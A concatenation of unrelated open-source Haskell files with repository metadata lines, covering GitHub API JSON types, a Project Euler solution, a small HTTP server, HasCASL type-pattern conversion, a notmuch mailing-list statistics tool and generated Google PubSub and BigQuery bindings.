_ -> drop 13 (snakeCase s)}
instance FromJSON GithubOrganization where
parseJSON =
genericParseJSON $
defaultOptions {fieldLabelModifier =
\s ->
case s of
"_githubOrganizationGithubOrganizationId" -> "id"
_ -> drop 21 (snakeCase s)}
instance FromJSON GithubRepository where
parseJSON =
withObject "repository" $
\o ->
do owner <- o .: "owner"
_githubRepositoryOwnerLogin <- owner .: "login"
_githubRepositoryName <- o .: "name"
_githubRepositoryDescription <- o .: "description"
_githubRepositoryPrivate <- o .: "private"
_githubRepositoryFork <- o .: "fork"
_githubRepositoryUrl <- o .: "url"
_githubRepositoryHtmlUrl <- o .: "html_url"
_githubRepositoryArchiveUrl <- o .: "archive_url"
_githubRepositoryAssigneesUrl <- o .: "assignees_url"
_githubRepositoryBlobsUrl <- o .: "blobs_url"
_githubRepositoryBranchesUrl <- o .: "branches_url"
_githubRepositoryCloneUrl <- o .: "clone_url"
_githubRepositoryCollaboratorsUrl <- o .: "collaborators_url"
_githubRepositoryCommentsUrl <- o .: "comments_url"
_githubRepositoryCommitsUrl <- o .: "commits_url"
_githubRepositoryCompareUrl <- o .: "compare_url"
_githubRepositoryContentsUrl <- o .: "contents_url"
_githubRepositoryContributorsUrl <- o .: "contributors_url"
_githubRepositoryDeploymentsUrl <- o .: "deployments_url"
_githubRepositoryDownloadsUrl <- o .: "downloads_url"
_githubRepositoryEventsUrl <- o .: "events_url"
_githubRepositoryForksUrl <- o .: "forks_url"
_githubRepositoryGitCommitsUrl <- o .: "git_commits_url"
_githubRepositoryGitRefsUrl <- o .: "git_refs_url"
_githubRepositoryGitTagsUrl <- o .: "git_tags_url"
_githubRepositoryGitUrl <- o .: "git_url"
_githubRepositoryHooksUrl <- o .: "hooks_url"
_githubRepositoryIssueCommentUrl <- o .: "issue_comment_url"
_githubRepositoryIssueEventsUrl <- o .: "issue_events_url"
_githubRepositoryIssuesUrl <- o .: "issues_url"
_githubRepositoryKeysUrl <- o .: "keys_url"
_githubRepositoryLabelsUrl <- o .: "labels_url"
_githubRepositoryLanguagesUrl <- o .: "languages_url"
_githubRepositoryMergesUrl <- o .: "merges_url"
_githubRepositoryMilestonesUrl <- o .: "milestones_url"
_githubRepositoryMirrorUrl <- o .: "mirror_url"
_githubRepositoryNotificationsUrl <- o .: "notifications_url"
_githubRepositoryPullsUrl <- o .: "pulls_url"
_githubRepositoryReleasesUrl <- o .: "releases_url"
_githubRepositorySshUrl <- o .: "ssh_url"
_githubRepositoryStargazersUrl <- o .: "stargazers_url"
_githubRepositoryStatusesUrl <- o .: "statuses_url"
_githubRepositorySubscribersUrl <- o .: "subscribers_url"
_githubRepositorySubscriptionUrl <- o .: "subscription_url"
_githubRepositorySvnUrl <- o .: "svn_url"
_githubRepositoryTagsUrl <- o .: "tags_url"
_githubRepositoryTeamsUrl <- o .: "teams_url"
_githubRepositoryTreesUrl <- o .: "trees_url"
_githubRepositoryHomepage <- o .: "homepage"
_githubRepositoryLanguage <- o .: "language"
_githubRepositoryForksCount <- o .: "forks_count"
_githubRepositoryStargazersCount <- o .: "stargazers_count"
_githubRepositoryWatchersCount <- o .: "watchers_count"
_githubRepositorySize <- o .: "size"
_githubRepositoryDefaultBranch <- o .: "default_branch"
_githubRepositoryOpenIssuesCount <- o .: "open_issues_count"
_githubRepositoryHasIssues <- o .: "has_issues"
_githubRepositoryHasWiki <- o .: "has_wiki"
_githubRepositoryHasPages <- o .: "has_pages"
_githubRepositoryHasDownloads <- o .: "has_downloads"
_githubRepositoryPushedAt <- o .: "pushed_at"
_githubRepositoryCreatedAt <- o .: "created_at"
_githubRepositoryUpdatedAt <- o .: "updated_at"
return GithubRepository {..}
data RawRepositoryHook =
RawRepositoryHook {hookId :: Int
,url :: URL
,testUrl :: URL
,pingUrl :: URL
,name :: Text
,active :: Bool
,createdAt :: UTCTime
,updatedAt :: UTCTime}
deriving (Show,Eq,Generic)
instance FromJSON RawRepositoryHook where
parseJSON =
genericParseJSON $
defaultOptions {fieldLabelModifier =
\s ->
case s of
"hookId" -> "id"
_ -> snakeCase s}
instance ToJSON GithubRepository
instance ToJSON GithubRepositoryHook
fromRaw :: Text -> Text -> RawRepositoryHook -> GithubRepositoryHook
fromRaw ownerLogin repoName RawRepositoryHook{..} =
let _githubRepositoryHookGithubRepositoryHookId = hookId
_githubRepositoryHookGithubRepositoryOwnerLogin = ownerLogin
_githubRepositoryHookGithubRepositoryName = repoName
_githubRepositoryHookUrl = url
_githubRepositoryHookTestUrl = testUrl
_githubRepositoryHookPingUrl = pingUrl
_githubRepositoryHookName = name
_githubRepositoryHookActive = active
_githubRepositoryHookCreatedAt = createdAt
_githubRepositoryHookUpdatedAt = updatedAt
in GithubRepositoryHook {..}
newtype AccessToken = AccessToken { _token :: Text}
deriving (Show,Read,Eq,Generic)
makeLenses ''AccessToken
instance PersistField AccessToken where
toPersistValue = PersistText . view token
fromPersistValue (PersistText t) = Right $ AccessToken t
fromPersistValue _ = Left "Not a text persist type"
instance FromJSON AccessToken where
parseJSON = withText "AccessToken" $ return . AccessToken
instance ToJSON AccessToken where
toJSON (AccessToken t) = toJSON t
data AccessTokenResponse =
AccessTokenResponse {_accessToken :: AccessToken
,_scope :: Text
,_tokenType :: Text}
deriving (Show,Eq,Generic)
makeLenses ''AccessTokenResponse
$(deriveJSON (aesonDrop 1 snakeCase)
''AccessTokenResponse)
data Config =
Config {_clientId :: String
,_clientSecret :: String
,_authUrl :: String
,_accessUrl :: String}
deriving (Eq,Show,Generic)
makeLenses ''Config
$(deriveJSON (dropPrefixJSONOptions "_")
''Config)
| krisajenkins/kashmir | src/Kashmir/Github/Types.hs | epl-1.0 | 12,593 | 48 | 22 | 3,918 | 1,248 | 667 | 581 | 174 | 1 |
--Smallest positive number divisible by [1..20]
allTrue :: [Bool] -> Bool
allTrue (x:xs)
| x == False = False
| otherwise = allTrue xs
allTrue [] = True
listModulus n (x:xs) = n `mod` x : listModulus n xs
listModulus _ [] = []
smallestDivis n =
case x of
True -> n
False -> smallestDivis $ n + 20
where x =allTrue $ map (==0) $ listModulus n [11..20]
main = do
return $ smallestDivis 20
| NaevaTheCat/Project-Euler-Haskell | P5.hs | gpl-2.0 | 418 | 1 | 9 | 108 | 185 | 94 | 91 | 14 | 2 |
--
-- Project: SHWS - Simple Haskell Web Server
-- Author: Petr Zemek <s3rvac@gmail.com>, 2009
--
-- | HTTP server.
module Server(run) where
import Prelude hiding (catch)
import Control.Concurrent
import Control.Exception
import Control.Monad
import Data.Maybe
import IO hiding (catch)
import Network
import Network.HTTP
import Network.HTTP.Headers
import Text.Regex.Posix
import System.Posix.Signals
import System.Timeout
import Common
import Log
import qualified RequestHandler
-- | Handle for HTTP connections.
instance Stream Handle where
readLine h = hGetLine h >>= \l -> return $ Right $ l ++ "\n"
readBlock h n = replicateM n (hGetChar h) >>= return . Right
writeBlock h s = mapM_ (hPutChar h) s >>= return . Right
close = hClose
-- | Put Header class into the Eq class (this is not done in the HTTP module).
instance Eq Header where
(Header hn1 hv1) == (Header hn2 hv2) = hn1 == hn2 && hv1 == hv2
{-|
Starts the HTTP server. Parameters are the port number on which the server
will listen, path to the web server root directory where requested files
will be searched, indexFile, logger and timeout.
-}
run :: PortID -> String -> String -> Logger -> Int -> IO ()
run portNum serverRoot indexFile logger connTimeout = do
-- Ignore SIGPIPE signal (to prevent server from stopping when
-- some client connection is closed)
installHandler sigPIPE Ignore $ Just fullSignalSet
-- Accept connections
withSocketsDo $ do socket <- listenOn portNum
serverLoop socket
`finally` (sClose socket)
where serverLoop socket =
forever $ acceptConnection socket connTimeout $ handleConnection $
RequestHandler.getRequestHandler serverRoot indexFile logger
{-|
Accepts a new connection and creates a thread for handling that connection.
The connection will be handled by the selected HTTP connection handler.
-}
acceptConnection :: Socket -> Int -> (Handle -> String -> Int -> IO ()) -> IO ThreadId
acceptConnection socket to ch = do (conn, hostName, _) <- accept socket
-- Disable buffering (this causes problems when
-- handling persistent connections)
hSetBuffering conn NoBuffering
-- Create a thread for that connection handling
forkIO $ ch conn hostName to
{-|
Handles the selected connection (conn, hn is the client host name) with
the selected request handler (rh). If to (timeout) is > 0, then timeout
specified in to is used (in seconds).
-}
handleConnection :: RequestHandler.RequestHandler -> Handle -> String -> Int -> IO ()
handleConnection rh conn hn to = impl `catch` (\_ -> return ()) -- Ignore errors
`finally` (close conn)
where impl = do -- Receive request
requestOrErr <- receiveRequest to conn
if (isTimeoutOrErr requestOrErr)
then do close conn
else do
let request = getEitherRight $ fromJust requestOrErr
-- Handle request
response <- rh request hn
-- Send response
respondHTTP conn response
-- If the client set the connection to be kept alive,
-- try to receive another request
if keepAlive request
then handleConnection rh conn hn to
else close conn
isTimeoutOrErr r = isNothing r || (isEitherLeft $ fromJust r)
isHttp11 r = (show r) =~ "^[^\n]*HTTP/1.1\r\n.*$"
hasKeepAlive (Request _ _ hs _) = elem (Header HdrConnection "keep-alive") hs
hasConnClose (Request _ _ hs _) = elem (Header HdrConnection "close") hs
keepAlive r = hasKeepAlive r || (isHttp11 r && (not $ hasConnClose r))
receiveRequest t c = do if t > 0
-- Timeout is enabled (it must be in microsecs,
-- so multiply it by 10^6)
then timeout (t * 1000000) $ receiveHTTP c
-- Timeout is disabled
else do r <- receiveHTTP c
return $ Just r
-- End of file
| s3rvac/shws | src/Server.hs | gpl-2.0 | 4,507 | 0 | 16 | 1,554 | 872 | 449 | 423 | -1 | -1 |
{- |
Module : $Header$
Description : convert type patterns to type identifier applications
Copyright : (c) Christian Maeder and Uni Bremen 2002-2005
License : GPLv2 or higher, see LICENSE.txt
Maintainer : Christian.Maeder@dfki.de
Stability : provisional
Portability : portable
convert type patterns to type identifier applications
-}
module HasCASL.ConvertTypePattern
( toTypePattern
, convertTypePatterns
, convertTypePattern
) where
import Common.Lexer
import Common.Id
import Common.Result
import HasCASL.As
import HasCASL.AsUtils
import HasCASL.PrintAs ()
-- | store identifier application as a type pattern
toTypePattern :: (Id, [TypeArg]) -> TypePattern
toTypePattern (i, tArgs) = TypePattern i tArgs nullRange
-- | convert type patterns
convertTypePatterns :: [TypePattern] -> Result [(Id, [TypeArg])]
convertTypePatterns ts = case ts of
[] -> return []
s : r -> let
Result d m = convertTypePattern s
Result ds (Just l) = convertTypePatterns r
in Result (d ++ ds) $ Just $ case m of
Nothing -> l
Just i -> i : l
illegalTypePattern :: TypePattern -> Result a
illegalTypePattern = mkError "illegal type pattern"
illegalTypePatternArg :: TypePattern -> Result a
illegalTypePatternArg = mkError "illegal type pattern argument"
illegalTypeId :: TypePattern -> Result a
illegalTypeId = mkError "illegal type pattern identifier"
-- | convert a type pattern
convertTypePattern :: TypePattern -> Result (Id, [TypeArg])
convertTypePattern tp = case tp of
TypePattern t as _ -> return (t, as)
TypePatternToken t ->
if isPlace t then illegalTypePattern tp else return (simpleIdToId t, [])
MixfixTypePattern [ra, ri@(TypePatternToken inTok), rb] ->
if isSignChar $ head $ tokStr inTok
then let inId = Id [Token place $ getRange ra, inTok,
Token place $ getRange rb] [] nullRange
in case (ra, rb) of
(TypePatternToken (Token "__" _),
TypePatternToken (Token "__" _)) -> return (inId, [])
_ -> do a <- convertToTypeArg ra
b <- convertToTypeArg rb
return (inId, [a, b])
else case ra of
TypePatternToken t1 -> do
a <- convertToTypeArg ri
b <- convertToTypeArg rb
return (simpleIdToId t1, [a, b])
_ -> illegalTypePattern tp
MixfixTypePattern (TypePatternToken t1 : rp) ->
if isPlace t1 then case rp of
[TypePatternToken inId, TypePatternToken t2] ->
if isPlace t2 && isSignChar (head $ tokStr inId)
then return (Id [t1,inId,t2] [] nullRange, [])
else illegalTypePattern tp
_ -> illegalTypePattern tp
else case rp of
BracketTypePattern Squares as@(_:_) ps : rp2 -> do
is <- mapM convertToId as
rs <- mapM convertToTypeArg rp2
return (Id [t1] is ps, rs)
_ -> do
as <- mapM convertToTypeArg rp
return (simpleIdToId t1, as)
BracketTypePattern bk [ap] ps -> case bk of
Parens -> convertTypePattern ap
_ -> let (o, c) = getBrackets bk
tid = Id [Token o ps, Token place $ getRange ap,
Token c ps] [] nullRange
in case ap of
TypePatternToken t -> if isPlace t then
return (tid, [])
else return (tid, [TypeArg (simpleIdToId t) NonVar MissingKind
rStar 0 Other nullRange])
_ -> do a <- convertToTypeArg ap
return (tid, [a])
_ -> illegalTypePattern tp
convertToTypeArg :: TypePattern -> Result TypeArg
convertToTypeArg tp = case tp of
TypePatternToken t -> if isPlace t then illegalTypePatternArg tp else
return $ TypeArg (simpleIdToId t)
NonVar MissingKind rStar 0 Other nullRange
TypePatternArg a _ -> return a
BracketTypePattern Parens [stp] _ -> convertToTypeArg stp
_ -> illegalTypePatternArg tp
convertToId :: TypePattern -> Result Id
convertToId tp = case tp of
TypePatternToken t ->
if isPlace t then illegalTypeId tp else return $ Id [t] [] nullRange
MixfixTypePattern [] -> error "convertToId: MixfixTypePattern []"
MixfixTypePattern (hd : tps) ->
if null tps then convertToId hd
else do
let (toks, comps) = break ( \ p ->
case p of BracketTypePattern Squares (_:_) _ -> True
_ -> False) tps
ts <- mapM convertToToks (hd:toks)
(is, ps) <- if null comps then return ([], nullRange)
else convertToIds $ head comps
pls <- if null comps then return []
else mapM convertToPlace $ tail comps
return $ Id (concat ts ++ pls) is ps
_ -> do
ts <- convertToToks tp
return $ Id ts [] nullRange
convertToIds :: TypePattern -> Result ([Id], Range)
convertToIds tp = case tp of
BracketTypePattern Squares tps@(_ : _) ps -> do
is <- mapM convertToId tps
return (is, ps)
_ -> illegalTypeId tp
convertToToks :: TypePattern -> Result [Token]
convertToToks tp = case tp of
TypePatternToken t -> return [t]
BracketTypePattern bk [stp] ps -> case bk of
Parens -> illegalTypeId stp
_ -> let [o,c] = mkBracketToken bk ps in do
ts <- convertToToks tp
return (o : ts ++ [c])
MixfixTypePattern tps -> do
ts <- mapM convertToToks tps
return $ concat ts
_ -> illegalTypeId tp
convertToPlace :: TypePattern -> Result Token
convertToPlace tp = case tp of
TypePatternToken t -> if isPlace t then return t else illegalTypeId tp
_ -> illegalTypeId tp
| nevrenato/Hets_Fork | HasCASL/ConvertTypePattern.hs | gpl-2.0 | 5,834 | 0 | 22 | 1,809 | 1,831 | 906 | 925 | 126 | 17 |
module Gabriel.Commands ( Command(..)
) where
import Data.Binary
data Command = UpdateCommand [String]
| KillCommand
| SigCommand String
| Puts String
| RestartCommand
| CheckCommand
| CommandOk
| CommandError String
deriving (Show)
instance Binary Command where
put (UpdateCommand s) = putWord8 0 >> put s
put (KillCommand) = putWord8 1
put (RestartCommand) = putWord8 2
put (CheckCommand) = putWord8 3
put (SigCommand s) = putWord8 4 >> put s
put (Puts s) = putWord8 25 >> put s
put (CommandOk) = putWord8 128
put (CommandError s) = putWord8 254 >> put s
get = do
tag_ <- getWord8
case tag_ of
0 -> get >>= \s -> return (UpdateCommand s)
1 -> return KillCommand
2 -> return RestartCommand
3 -> return CheckCommand
4 -> get >>= \s -> return (SigCommand s)
25 -> get >>= \s -> return (Puts s)
128 -> return CommandOk
254 -> get >>= \s -> return (CommandError s)
| udoprog/gabriel | Gabriel/Commands.hs | gpl-3.0 | 1,106 | 0 | 15 | 397 | 377 | 190 | 187 | 31 | 0 |
-- -*-haskell-*-
-- Vision (for the Voice): an XMMS2 client.
--
-- Author: Oleg Belozeorov
-- Created: 13 Jul. 2010
--
-- Copyright (C) 2011 Oleg Belozeorov
--
-- This program is free software; you can redistribute it and/or
-- modify it under the terms of the GNU General Public License as
-- published by the Free Software Foundation; either version 3 of
-- the License, or (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-- General Public License for more details.
--
{-# LANGUAGE TypeOperators,
MultiParamTypeClasses,
FunctionalDependencies,
FlexibleInstances,
OverlappingInstances,
UndecidableInstances #-}
module Data.Env
( Env (..)
, mkEnv
, (:*:) (..)
, EnvX (..)
, EnvB (..)
, Extract (..)
) where
newtype Env ix a = Env a
mkEnv :: ix -> a -> Env ix a
mkEnv = const Env
data a :*: b = a :*: b
infixr 9 :*:
class EnvX ix a e | ix e -> a where
extract :: ix -> e -> a
instance EnvX ix a ((Env ix a) :*: b) where
extract _ ((Env a) :*: _) = a
instance EnvX ix a e => EnvX ix a (b :*: e) where
extract ix (_ :*: e) = extract ix e
class EnvB ix a e r k | k -> ix a r where
build :: e -> k -> r
instance EnvB ix a e (Env ix a :*: ()) (Env ix a) where
build _ k = k :*: ()
instance (EnvB ix a e (r :*: ()) k, EnvB ix2 a2 e r2 k2) => EnvB ix a e (r :*: r2) (k :*: k2) where
build e (a :*: b) =
let k :*: _ = build e a
in k :*: (build e b)
data Extract ix a = Extract
instance EnvX ix a e => EnvB ix a e (Env ix a :*: ()) (Extract ix a) where
build e d = (Env $ extract (ix d) e) :*: ()
where ix :: Extract ix a -> ix
ix = const undefined
| upwawet/vision | src/Data/Env.hs | gpl-3.0 | 1,878 | 0 | 11 | 521 | 584 | 322 | 262 | -1 | -1 |
import Data.QLogic.BoxWorld
import Data.QLogic
import qualified Data.IntSet as IntSet
import Data.IntSet ((\\))
x = Observable 'X' [0, 1]
y = Observable 'Y' [0, 1]
left = [x, y]
right = [x, y]
-- x = Observable 'X' [0, 1, 2]
-- y = Observable 'Y' [0, 1, 2]
-- z = Observable 'Z' [0, 1, 2]
-- left = [x, y, z]
-- right = [x, y, z]
main :: IO ()
main = do
let ql = boxWorldLogic $ Two (left, right)
q2set = toRepr ql
set2q = fromRepr ql
logic = logicRepr ql
a = elementsOf ql !! 10
b = elementsOf ql !! 56
seta = q2set a
seto = oneOf logic
putStrLn $ show . length $ elementsOf ql
-- print $ set2q a
-- print $ set2q b
print a
print $ set2q . q2set $ a
print b
print $ set2q . q2set $ b
print $ orthoIn ql a b
print "===================================="
print $ q2set a
print $ oneOf logic
print "----"
print $ IntSet.difference (oneOf logic) (q2set a)
print $ IntSet.difference (q2set a) (oneOf logic)
-- print $ (oneOf logic) \\ (q2set a)
-- print $ seto \\ seta
-- print $ seta \\ seto
print "----"
print $ ocmplIn logic $ q2set a
print "===================================="
print $ ocmplIn ql a
print $ orthoIn ql a $ ocmplIn ql a
print $ compatIn ql a b
let aa = read "[X1Y0]+[X0X1]+[X0X0]" :: Question (Two Atomic)
bb = read "[X1Y0]+[X0Y1]+[X0Y0]" :: Question (Two Atomic)
print $ equalIn ql aa bb
| ttylec/QLogic | research/concrete.hs | gpl-3.0 | 1,479 | 1 | 12 | 432 | 492 | 240 | 252 | 39 | 1 |
-- This file is part of nmstats - mailing list statistics extractor
-- Copyright (C) 2015 Red Hat, Inc.
--
-- hs-notmuch is free software: you can redistribute it and/or modify
-- it under the terms of the GNU General Public License as published by
-- the Free Software Foundation, either version 3 of the License, or
-- (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- GNU General Public License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with this program. If not, see <http://www.gnu.org/licenses/>.
import Control.Monad ((>=>))
import Data.Foldable (traverse_)
import Data.Semigroup ((<>))
import System.Environment (getArgs)
import Text.Printf (printf)
import Data.Time (Day, addDays, getZonedTime, utctDay, zonedTimeToUTC)
import Notmuch
import Notmuch.Search
main :: IO ()
main = do
[db'', listAddr, fromDomain, daysArg] <- getArgs
db' <- databaseOpen db''
today <- fmap (utctDay . zonedTimeToUTC) getZonedTime
let
n = abs $ read daysArg
dates = zipWith (addDays . (0-)) [n,n-1..0] (repeat today)
case db' of
Left status -> putStrLn $ "Error: " <> show status
Right db ->
traverse_ (infoForDate db listAddr fromDomain >=> printTable) dates
infoForDate
:: Database
-> String -- ^ list address
-> String -- ^ origin domain
-> Day
-> IO (Day, Int, Int, Int)
infoForDate db listAddr fromDomain date = do
let
dateExpr = Date <$> show <*> show $ date
toListExpr = To listAddr
fromDomainExpr = From ("*@" <> fromDomain)
allMsgs <- query db (dateExpr `And` toListExpr)
notFromDomainMsgs <- query db (dateExpr `And` toListExpr `And` Not fromDomainExpr)
nMsgs <- queryCountMessages allMsgs
nMsgsNotFromDomain <- queryCountMessages notFromDomainMsgs
nThreads <- queryCountThreads allMsgs
return (date, nMsgs, nMsgsNotFromDomain, nThreads)
printVerbose :: String -> (Day, Int, Int, Int) -> IO ()
printVerbose fromDomain (date, nMsgs, nMsgsNotFromDomain, nThreads) = do
print date
putStrLn $ " " <> show nMsgs <> " messages"
putStrLn $ " " <> show nMsgsNotFromDomain <> " messages not from " <> fromDomain
putStrLn $ " " <> show nThreads <> " active threads"
printTable :: (Day, Int, Int, Int) -> IO ()
printTable (d, n, m, p) = printf "%s %d %d %d\n" (show d) n m p
| frasertweedale/hs-mlstats | src/Main.hs | gpl-3.0 | 2,501 | 0 | 13 | 480 | 653 | 349 | 304 | 45 | 2 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# OPTIONS_GHC -fno-warn-duplicate-exports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- |
-- Module : Network.Google.Resource.PubSub.Projects.Snapshots.Get
-- Copyright : (c) 2015-2016 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Gets the configuration details of a snapshot. Snapshots are used in Seek
-- operations, which allow you to manage message acknowledgments in bulk.
-- That is, you can set the acknowledgment state of messages in an existing
-- subscription to the state captured by a snapshot.
--
-- /See:/ <https://cloud.google.com/pubsub/docs Cloud Pub/Sub API Reference> for @pubsub.projects.snapshots.get@.
module Network.Google.Resource.PubSub.Projects.Snapshots.Get
(
-- * REST Resource
ProjectsSnapshotsGetResource
-- * Creating a Request
, projectsSnapshotsGet
, ProjectsSnapshotsGet
-- * Request Lenses
, psgsXgafv
, psgsSnapshot
, psgsUploadProtocol
, psgsAccessToken
, psgsUploadType
, psgsCallback
) where
import Network.Google.Prelude
import Network.Google.PubSub.Types
-- | A resource alias for @pubsub.projects.snapshots.get@ method which the
-- 'ProjectsSnapshotsGet' request conforms to.
type ProjectsSnapshotsGetResource =
"v1" :>
Capture "snapshot" Text :>
QueryParam "$.xgafv" Xgafv :>
QueryParam "upload_protocol" Text :>
QueryParam "access_token" Text :>
QueryParam "uploadType" Text :>
QueryParam "callback" Text :>
QueryParam "alt" AltJSON :> Get '[JSON] Snapshot
-- | Gets the configuration details of a snapshot. Snapshots are used in Seek
-- operations, which allow you to manage message acknowledgments in bulk.
-- That is, you can set the acknowledgment state of messages in an existing
-- subscription to the state captured by a snapshot.
--
-- /See:/ 'projectsSnapshotsGet' smart constructor.
data ProjectsSnapshotsGet =
ProjectsSnapshotsGet'
{ _psgsXgafv :: !(Maybe Xgafv)
, _psgsSnapshot :: !Text
, _psgsUploadProtocol :: !(Maybe Text)
, _psgsAccessToken :: !(Maybe Text)
, _psgsUploadType :: !(Maybe Text)
, _psgsCallback :: !(Maybe Text)
}
deriving (Eq, Show, Data, Typeable, Generic)
-- | Creates a value of 'ProjectsSnapshotsGet' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'psgsXgafv'
--
-- * 'psgsSnapshot'
--
-- * 'psgsUploadProtocol'
--
-- * 'psgsAccessToken'
--
-- * 'psgsUploadType'
--
-- * 'psgsCallback'
projectsSnapshotsGet
:: Text -- ^ 'psgsSnapshot'
-> ProjectsSnapshotsGet
projectsSnapshotsGet pPsgsSnapshot_ =
ProjectsSnapshotsGet'
{ _psgsXgafv = Nothing
, _psgsSnapshot = pPsgsSnapshot_
, _psgsUploadProtocol = Nothing
, _psgsAccessToken = Nothing
, _psgsUploadType = Nothing
, _psgsCallback = Nothing
}
-- | V1 error format.
psgsXgafv :: Lens' ProjectsSnapshotsGet (Maybe Xgafv)
psgsXgafv
= lens _psgsXgafv (\ s a -> s{_psgsXgafv = a})
-- | Required. The name of the snapshot to get. Format is
-- \`projects\/{project}\/snapshots\/{snap}\`.
psgsSnapshot :: Lens' ProjectsSnapshotsGet Text
psgsSnapshot
= lens _psgsSnapshot (\ s a -> s{_psgsSnapshot = a})
-- | Upload protocol for media (e.g. \"raw\", \"multipart\").
psgsUploadProtocol :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsUploadProtocol
= lens _psgsUploadProtocol
(\ s a -> s{_psgsUploadProtocol = a})
-- | OAuth access token.
psgsAccessToken :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsAccessToken
= lens _psgsAccessToken
(\ s a -> s{_psgsAccessToken = a})
-- | Legacy upload protocol for media (e.g. \"media\", \"multipart\").
psgsUploadType :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsUploadType
= lens _psgsUploadType
(\ s a -> s{_psgsUploadType = a})
-- | JSONP
psgsCallback :: Lens' ProjectsSnapshotsGet (Maybe Text)
psgsCallback
= lens _psgsCallback (\ s a -> s{_psgsCallback = a})
instance GoogleRequest ProjectsSnapshotsGet where
type Rs ProjectsSnapshotsGet = Snapshot
type Scopes ProjectsSnapshotsGet =
'["https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/pubsub"]
requestClient ProjectsSnapshotsGet'{..}
= go _psgsSnapshot _psgsXgafv _psgsUploadProtocol
_psgsAccessToken
_psgsUploadType
_psgsCallback
(Just AltJSON)
pubSubService
where go
= buildClient
(Proxy :: Proxy ProjectsSnapshotsGetResource)
mempty
| brendanhay/gogol | gogol-pubsub/gen/Network/Google/Resource/PubSub/Projects/Snapshots/Get.hs | mpl-2.0 | 5,191 | 0 | 15 | 1,130 | 705 | 415 | 290 | 103 | 1 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# OPTIONS_GHC -fno-warn-duplicate-exports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- |
-- Module : Network.Google.Resource.BigQuery.Jobs.Insert
-- Copyright : (c) 2015-2016 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Starts a new asynchronous job. Requires the Can View project role.
--
-- /See:/ <https://cloud.google.com/bigquery/ BigQuery API Reference> for @bigquery.jobs.insert@.
module Network.Google.Resource.BigQuery.Jobs.Insert
(
-- * REST Resource
JobsInsertResource
-- * Creating a Request
, jobsInsert
, JobsInsert
-- * Request Lenses
, jiPayload
, jiProjectId
) where
import Network.Google.BigQuery.Types
import Network.Google.Prelude
-- | A resource alias for @bigquery.jobs.insert@ method which the
-- 'JobsInsert' request conforms to.
type JobsInsertResource =
"bigquery" :>
"v2" :>
"projects" :>
Capture "projectId" Text :>
"jobs" :>
QueryParam "alt" AltJSON :>
ReqBody '[JSON] Job :> Post '[JSON] Job
:<|>
"upload" :>
"bigquery" :>
"v2" :>
"projects" :>
Capture "projectId" Text :>
"jobs" :>
QueryParam "alt" AltJSON :>
QueryParam "uploadType" Multipart :>
MultipartRelated '[JSON] Job :> Post '[JSON] Job
-- | Starts a new asynchronous job. Requires the Can View project role.
--
-- /See:/ 'jobsInsert' smart constructor.
data JobsInsert =
JobsInsert'
{ _jiPayload :: !Job
, _jiProjectId :: !Text
}
deriving (Eq, Show, Data, Typeable, Generic)
-- | Creates a value of 'JobsInsert' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'jiPayload'
--
-- * 'jiProjectId'
jobsInsert
:: Job -- ^ 'jiPayload'
-> Text -- ^ 'jiProjectId'
-> JobsInsert
jobsInsert pJiPayload_ pJiProjectId_ =
JobsInsert' {_jiPayload = pJiPayload_, _jiProjectId = pJiProjectId_}
-- | Multipart request metadata.
jiPayload :: Lens' JobsInsert Job
jiPayload
= lens _jiPayload (\ s a -> s{_jiPayload = a})
-- | Project ID of the project that will be billed for the job
jiProjectId :: Lens' JobsInsert Text
jiProjectId
= lens _jiProjectId (\ s a -> s{_jiProjectId = a})
instance GoogleRequest JobsInsert where
type Rs JobsInsert = Job
type Scopes JobsInsert =
'["https://www.googleapis.com/auth/bigquery",
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/devstorage.full_control",
"https://www.googleapis.com/auth/devstorage.read_only",
"https://www.googleapis.com/auth/devstorage.read_write"]
requestClient JobsInsert'{..}
= go _jiProjectId (Just AltJSON) _jiPayload
bigQueryService
where go :<|> _
= buildClient (Proxy :: Proxy JobsInsertResource)
mempty
instance GoogleRequest (MediaUpload JobsInsert) where
type Rs (MediaUpload JobsInsert) = Job
type Scopes (MediaUpload JobsInsert) =
Scopes JobsInsert
requestClient (MediaUpload JobsInsert'{..} body)
= go _jiProjectId (Just AltJSON) (Just Multipart)
_jiPayload
body
bigQueryService
where _ :<|> go
= buildClient (Proxy :: Proxy JobsInsertResource)
mempty
